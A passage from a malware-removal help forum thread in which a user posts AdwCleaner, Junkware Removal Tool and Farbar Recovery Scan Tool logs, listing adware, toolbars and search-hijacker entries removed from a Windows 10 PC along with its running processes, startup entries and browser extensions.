[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{9D51D472-88C3-4E12-93EA-8AEAFC57B227}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{B12E159D-74BA-45B7-AE12-F6D1A71F9E50}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{B4685AA8-DBDD-4D8E-9A16-51B64646026A}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{BB925FE4-7161-454F-88EE-7F58C40F549C}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{BE1EDE40-9C0B-4913-BF21-09F7AB5E270E}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{CA95AC1F-EBBD-4B84-AA2D-5383D029E534}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{FCCC0AFD-B6BD-40A4-8A01-2A4B934C0546}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{2238806b-78fe-443b-84c0-3c3d7647b8b8}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{5bb649a4-1c05-4e18-b7a0-80a0fd29d8d7}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{628F3201-34D0-49C0-BB9A-82A26AEFB291}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{131a1f72-5c50-43cf-ba3e-3ac75df1188b}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{23119123-0854-469D-807A-171568457991}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{A9582D7B-F24A-441D-9D26-450D58F3CD17}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{EE0D8859-2ED4-4B0D-9812-16865B9AFD65}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{004F2608-3092-40C2-B880-1FD74DDA6B9A}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{0CD246B5-EC5A-4601-9A8F-C6D21742BB86}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{15F335C1-5CC0-4786-ABB9-06E727FF2D42}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{1B4CF49B-8B69-4A90-8B51-D2088E1EC1BA}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{1B749406-A17C-4A1C-9E87-E1E94A0C1A52}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{1BCF3F83-F9A0-4075-B0BC-53128BBC228F}
[#] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{23119123-0854-469D-807A-171568457991}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{23905799-4E4E-457F-8EEA-88A514D38DCA}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{2EEF77F9-4F97-4158-9209-A95B38C38EC1}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{4025F9A4-91CE-4F20-8486-8A3D95564DB3}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{41040243-9338-4C91-9457-AD11F56F48E1}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{4B6F98D4-3D4D-4D72-A89B-7B75207AF16D}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{4E60D532-F00E-495B-BD0F-75F1B96CC714}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{5128A486-0AED-4F8D-B1C0-1E0FF64CD1D0}
[-] Key Deleted : HKCU\Software\dsiteproducts
[-] Key Deleted : HKCU\Software\InstallCore
[-] Key Deleted : HKCU\Software\mysearchdial.com
[-] Key Deleted : HKCU\Software\Softonic
[-] Key Deleted : HKCU\Software\Tutorials
[-] Key Deleted : HKCU\Software\TutoTag
[-] Key Deleted : HKCU\Software\CouponXplorer_5z
[-] Key Deleted : HKCU\Software\AppDataLow\Software\Yahoo\Companion
[-] Key Deleted : HKCU\Software\AppDataLow\Software\CouponXplorer_5z
[-] Key Deleted : HKLM\SOFTWARE\DESKTOPPLAY
[-] Key Deleted : HKLM\SOFTWARE\InstallIQ
[-] Key Deleted : HKLM\SOFTWARE\Tutorials
[-] Key Deleted : HKLM\SOFTWARE\CouponXplorer_5z
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Installer\Features\4E30E037E0535E84D9E3349209D354D4
[-] Key Deleted : HKLM\SOFTWARE\Classes\Installer\Products\4E30E037E0535E84D9E3349209D354D4
[-] Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\4E30E037E0535E84D9E3349209D354D4
[#] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Installer\Products\4E30E037E0535E84D9E3349209D354D4
[-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{5ED3F37F-AD3B-44DF-AA5A-C1B51FDBDF51}
[-] Data Restored : HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope]
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{28a014ed-4ae8-49f4-a954-4f38e07b24fb} [NameServer]
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{556f7f8c-c8e8-4a6f-8480-14d98b819937} [NameServer]
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{85ffa754-8db8-4cb7-b1d1-1001444e1282} [NameServer]

***** [ Web browsers ] *****

[-] [C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\prefs.js] [Preference] Deleted : user_pref("extensions.ixquicktoolbar.historyixquick", "[]");
[-] [C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\prefs.js] [Preference] Deleted : user_pref("extensions.ixquicktoolbar.home", "startpage");
[-] [C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\prefs.js] [Preference] Deleted : user_pref("extensions.ixquicktoolbar.hxxps", true);
[-] [C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\prefs.js] [Preference] Deleted : user_pref("extensions.ixquicktoolbar.query", "");
[-] [C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\prefs.js] [Preference] Deleted : user_pref("keyword.URL", "hxxps://search.yahoo.com/search?fr=greentree_ff1&ei=utf-8&ilc=12&type=282369&p=");
[-] [C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : aol.com
[-] [C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : ask.com
[-] [C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Default_Search_Provider_Data] Deleted : hxxp://www-searching.com/search.aspx?site=shyos&prd=set_ch&q={searchTerms}&s=FCIztutbl11,6716c22f-1031-4942-a662-741aed4da972,
[-] [C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Deleted : bopakagnckmlgajfccecajhnimjiiedh

*************************

:: "Tracing" keys removed
:: Proxy settings cleared
:: Winsock settings cleared
:: TCP/IP settings cleared
:: Firewall settings cleared
:: IPSec settings cleared
:: BITS queue cleared
:: IE policies deleted
:: Chrome policies deleted

*************************

C:\Program Files (x86)\AdwCleaner\AdwCleaner[C1].txt - [14726 bytes] - [09/03/2016 17:33:35]
C:\Program Files (x86)\AdwCleaner\AdwCleaner[S1].txt - [13915 bytes] - [09/03/2016 17:31:39]

########## EOF - C:\Program Files (x86)\AdwCleaner\AdwCleaner[C1].txt - [14914 bytes] ##########
 


#8
LLL31

Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.0.3 (02.09.2016)
Operating System: Windows 10 Home x64
Ran by levilaing (Administrator) on Wed 03/09/2016 at 17:44:24.66
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 12

Failed to delete: C:\WINDOWS\system32\drivers\bsdriver.sys (File)
Successfully deleted: C:\Users\levilaing\Appdata\LocalLow\company (Folder)
Successfully deleted: C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\searchplugins\norton-safe-search.xml (File)
Successfully deleted: C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\searchplugins\youtube-video-search.xml (File)
Successfully deleted: C:\WINDOWS\system32\drivers\cherimoya.sys (File)
Successfully deleted: C:\WINDOWS\prefetch\GOOGLETOOLBARMANAGER_A6282D74-32661EF9.pf (File)
Successfully deleted: C:\WINDOWS\prefetch\GOOGLETOOLBARNOTIFIER.EXE-B25C45A8.pf (File)
Successfully deleted: C:\WINDOWS\prefetch\VIDEOCONVERTERFREE.EXE-3DB3C933.pf (File)
Successfully repaired: C:\ProgramData\Microsoft\windows\Start Menu\Programs\Google Chrome.lnk (Shortcut)
Successfully repaired: C:\Users\levilaing\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (Shortcut)
Successfully repaired: C:\Users\levilaing\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk (Shortcut)
Successfully repaired: C:\Users\levilaing\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk (Shortcut)

Deleted the following from C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\prefs.js
user_pref(extensions.ixquicktoolbar.home, ixquick);



Registry: 2

Successfully deleted: HKLM\Software\Google\Chrome\Extensions\chgdeabpmphfhkoemjjglmilajldekbp (Registry Key)
Successfully deleted: HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\\BrowserPlugInHelper (Registry Value)




~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Wed 03/09/2016 at 17:47:26.50
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 


#9
LLL31

Here is the fresh scan and Addition log

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01
Ran by levilaing (administrator) on LEVISPC (09-03-2016 17:52:22)
Running from C:\Users\levilaing\Desktop
Loaded Profiles: levilaing (Available Profiles: levilaing)
Platform: Windows 10 Home Version 1511 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(HP) C:\Program Files (x86)\HP SimplePass\TrueSuiteService.exe
(Intel Corporation) C:\Windows\SysWOW64\IntelCpHeciSvc.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe
(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hp\Common\HPSupportSolutionsFrameworkService.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
() C:\Program Files (x86)\Canon\IJPLM\ijplmsvc.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Fitbit, Inc.) C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\ns.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
() C:\Windows\System32\valWBFPolicyService.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\ns.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
() C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe
(Realsil Microelectronics Inc.) C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Microsoft Corporation) C:\Windows\SysWOW64\notepad.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\conathst.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1664000 2013-10-14] (IDT, Inc.)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [444904 2012-09-20] (Adobe Systems Incorporated)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3944136 2015-07-17] (Synaptics Incorporated)
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [91432 2012-03-28] (CyberLink Corp.)
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [581024 2012-09-07] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [EgisTecPMMUpdate] => C:\Program Files (x86)\EgisTec IPS\PmmUpdate.exe [401192 2009-12-08] (Egis Technology Inc.)
HKLM-x32\...\Run: [EgisUpdate] => C:\Program Files (x86)\EgisTec IPS\EgisUpdate.exe [201512 2009-12-08] (Egis Technology Inc.)
HKLM-x32\...\Run: [VitaKeyTSR] => C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\EgisTSR.exe [379248 2010-03-25] (Egis Technology Inc. )
HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1075296 2013-04-25] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation)
HKLM-x32\...\Run: [Fitbit Connect] => C:\Program Files (x86)\Fitbit Connect\Fitbit Connect.exe [4369952 2014-11-07] (Fitbit, Inc.)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
HKLM-x32\...\Run: [CanonQuickMenu] => C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE [1282120 2013-05-02] (CANON INC.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [594992 2016-01-29] (Oracle Corporation)
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Run: [Power2GoExpress8] => C:\Program Files (x86)\CyberLink\Power2Go8\Power2GoExpress8.exe [1711680 2013-01-27] (CyberLink Corp.)
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Run: [Fitbit Connect] => C:\Program Files (x86)\Fitbit Connect\Fitbit Connect.exe [4369952 2014-11-07] (Fitbit, Inc.)
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Run: [Dashlane] => C:\Users\levilaing\AppData\Roaming\Dashlane\Dashlane.exe [227712 2016-02-29] ()
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Run: [DashlanePlugin] => C:\Users\levilaing\AppData\Roaming\Dashlane\DashlanePlugin.exe [285568 2016-02-29] ()
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\RunOnce: [Uninstall C:\Users\levilaing\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\levilaing\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1\amd64"
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\RunOnce: [Uninstall C:\Users\levilaing\AppData\Local\Microsoft\OneDrive\17.3.6301.0127\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\levilaing\AppData\Local\Microsoft\OneDrive\17.3.6301.0127\amd64"
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Policies\Explorer: [NoChangeStartMenu] 0
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Policies\Explorer: [NoLogOff] 0
Lsa: [Notification Packages] EgisPwdFilter EgisDSPwdFilter
ShellIconOverlayIdentifiers: [  OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\buShell.dll [2015-11-05] (Symantec Corporation)
ShellIconOverlayIdentifiers: [  OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\buShell.dll [2015-11-05] (Symantec Corporation)
ShellIconOverlayIdentifiers: [  OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\buShell.dll [2015-11-05] (Symantec Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 68.105.28.11 68.105.29.11 68.105.28.12
Tcpip\Parameters: [NameServer] 82.163.142.7 95.211.158.134
Tcpip\..\Interfaces\{28a014ed-4ae8-49f4-a954-4f38e07b24fb}: [DhcpNameServer] 82.163.142.7
Tcpip\..\Interfaces\{556f7f8c-c8e8-4a6f-8480-14d98b819937}: [DhcpNameServer] 68.105.28.11 68.105.29.11 68.105.28.12
Tcpip\..\Interfaces\{85ffa754-8db8-4cb7-b1d1-1001444e1282}: [DhcpNameServer] 82.163.142.7

Internet Explorer:
==================
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\coIEPlg.dll [2015-11-05] (Symantec Corporation)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO: EgisPBIE Class -> {7B51CCBE-4AF9-44A6-BDAB-D7F7E4C4E6F9} -> C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\x64\EgisPBIE.dll [2010-03-25] (Egis Technology Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Dashlane BHO -> {42D79B50-CC4A-4A8E-860F-BE674AF053A2} -> C:\Users\levilaing\AppData\Roaming\Dashlane\ie\Dashlanei.dll [2016-02-29] (Dashlane)
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\coIEPlg.dll [2015-11-05] (Symantec Corporation)
BHO-x32: Wondershare Video Converter Ultimate -> {65DEE40A-3E93-4cae-9F98-B8E06DCEE2BF} -> C:\Program Files (x86)\Wondershare\VideoConverterFree\SVRIEPlugin.dll [2013-06-18] (Wondershare Software Co., Ltd.)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\ssv.dll [2016-02-17] (Oracle Corporation)
BHO-x32: EgisPBIE Class -> {7B51CCBE-4AF9-44A6-BDAB-D7F7E4C4E6F9} -> C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\EgisPBIE.dll [2010-03-25] (Egis Technology Inc.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\jp2ssv.dll [2016-02-17] (Oracle Corporation)
Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\coIEPlg.dll [2015-11-05] (Symantec Corporation)
Toolbar: HKLM-x32 - Dashlane Toolbar - {669695BC-A811-4A9D-8CDF-BA8C795F261C} - C:\Users\levilaing\AppData\Roaming\Dashlane\ie\KWIEBar.dll [2016-02-29] (Dashlane)
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\coIEPlg.dll [2015-11-05] (Symantec Corporation)
Toolbar: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\coIEPlg.dll [2015-11-05] (Symantec Corporation)

FireFox:
========
FF ProfilePath: C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default
FF DefaultSearchEngine: DuckDuckGo
FF DefaultSearchEngine.US: DuckDuckGo
FF SelectedSearchEngine: DuckDuckGo
FF Homepage: about:home
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_20_0_0_306.dll [2016-02-09] ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2012-09-20] (Adobe Systems)
FF Plugin: adobe.com/AdobeExManDetect -> C:\Program Files (x86)\Adobe\Adobe Extension Manager CS6\Win64Plugin\npAdobeExManDetectX64.dll [2013-12-02] (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_306.dll [2016-02-09] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1205146.dll [2013-10-25] (Adobe Systems, Inc.)
FF Plugin-x32: @authentec.com/ffwloplugin -> C:\Program Files (x86)\HP SimplePass\npffwloplugin.dll [2013-06-07] ( HP)
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll [2015-10-13] (Google, Inc.)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-06] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-06] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\dtplugin\npDeployJava1.dll [2016-02-17] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\plugin2\npjp2.dll [2016-02-17] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2012-09-20] (Adobe Systems)
FF Plugin-x32: adobe.com/AdobeExManDetect -> C:\Program Files (x86)\Adobe\Adobe Extension Manager CS6\npAdobeExManDetectX86.dll [2013-12-02] (Adobe Systems)
FF SearchPlugin: C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\searchplugins\duckduckgo.xml [2014-10-16]
FF Extension: Ixquick Toolbar - C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\extensions\{0D4B5813-2CB5-439D-839C-4638597EFAFA}.xpi [2016-01-12]
FF Extension: Dashlane - C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\Extensions\[email protected] [2015-12-22]
FF Extension: DuckDuckGo Plus - C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\Extensions\[email protected] [2016-03-09]
FF Extension: TrueSuite Website Logon - C:\Program Files (x86)\Mozilla Firefox\distribution\bundles\[email protected] [2016-02-12] [not signed]
FF HKLM\...\Firefox\Extensions: [{C1A2A613-35F1-4FCF-B27F-2840527B6556}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NS_22.5.4.24\coFFAddon
FF Extension: Norton Identity Safe - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NS_22.5.4.24\coFFAddon [2016-01-18]
FF HKLM-x32\...\Firefox\Extensions: [{41ecbc0b-34d5-4cd4-935f-253a30e2cb7e}] - C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\FFExt
FF Extension: SimplePass Online Accounts Extension  - C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\FFExt [2013-12-13] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{8D150B8F-EFE8-45a3-A4A3-053020F48FAC}] - C:\Program Files (x86)\Wondershare\VideoConverterFree\SVRFirefoxExt
FF Extension: Wondershare Video Converter Ultimate - C:\Program Files (x86)\Wondershare\VideoConverterFree\SVRFirefoxExt [2015-07-09] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{C1A2A613-35F1-4FCF-B27F-2840527B6556}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NS_22.5.4.24\coFFAddon
FF HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Firefox\Extensions: [{8D150B8F-EFE8-45a3-A4A3-053020F48FAC}] - C:\Program Files (x86)\Wondershare\VideoConverterFree\SVRFirefoxExt

